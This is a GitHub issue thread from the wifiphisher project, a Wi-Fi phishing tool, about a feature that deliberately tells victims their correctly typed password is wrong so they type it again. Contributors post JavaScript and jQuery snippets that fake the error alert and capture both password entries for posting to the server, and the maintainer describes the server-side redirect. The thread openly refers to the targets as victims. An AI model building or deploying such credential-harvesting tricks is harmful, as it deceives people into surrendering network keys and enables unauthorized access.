### ISSUE TITLE
Ask for the password twice

### ISSUE THREAD

**Issue by catman85** [wifiphisher/wifiphisher#116]
No matter what the victim types when facing the proxy, we will show a fake error message at first attempt.

The idea behind this is:
1) In case someone gets suspicious and types something random, we present him a fake error message. The victim gives the proper key the next time
2)In case someone puts the right credentials, we present him a fake error message. The victim assumes a typo happened and retries with the right credentials once again...

I guess this could be implemented with simple client-side JavaScript.

**Comment by sophron** [comment]
Thanks for proposing this.

**Comment by catman85** [comment]
...
<form action="index.html" method="post" onsubmit="return validateForm()">
...


<script>	
                var try_once=false;
		function validateForm() {
		        if (!try_once) {
				alert("Incorrect password please try again");
				try_once=true;
				return false;
			}
		}
</script>

**Comment by Globalgoon** [comment]
Excellent idea.

**Comment by sandman6578** [comment]
wow good idea :)

**Comment by catman85** [comment]
Thanks guys! ^^ The python script must be also customized so that it receives 2 PreShared Keys.

**Comment by HassenPy** [comment]
i think it should be on the server side, personally i dig into the code when i see alert() messages.

**Comment by ArionMiles** [comment]
What changes should be implemented in the Python script to make this work?

**Comment by Vigilence** [comment]
I was just about to ask for the same enhancement.

**Comment by sophron** [comment]
@ArionMiles, @Vigilence Changes need to be done in the handling of a POST request <a href="https://github.com/sophron/wifiphisher/blob/master/wifiphisher.py#L250">here</a>. If the flag for asking the credentials twice is turned on, the webserver should redirect to the error page (e.g. `index.html#error`) the first time.

**Comment by strasharo** [comment]
Or instead of doing this just collect a handshake and verify the password against it like linset does?

**Comment by sophron** [comment]
This has not been implemented yet.

**Comment by laozi999** [comment]
Can all be achieved with jQuery:

```
var locked;

$('form').submit(function(e){
    e.preventDefault();

    if (locked) {
        var firstPassword = $('input[type=password]').val();
        locked = false;
        // trigger wrong password alert here
        return false;
    } else {
        $.post( '/post', 'wfphshr-wpa-first-password=' + firstPassword + '&wfphshr-wpa-second-password=' + $('input[type=password]').val() , function() {
            // success, do something
        });
    }
});
```

**Comment by sophron** [comment]
@laozi999 Correct. You can check my full view on this issue on #290.

**Comment by blackHatMonkey** [comment]
This can be done using the `javascript` or `jQuery` on the browser side.
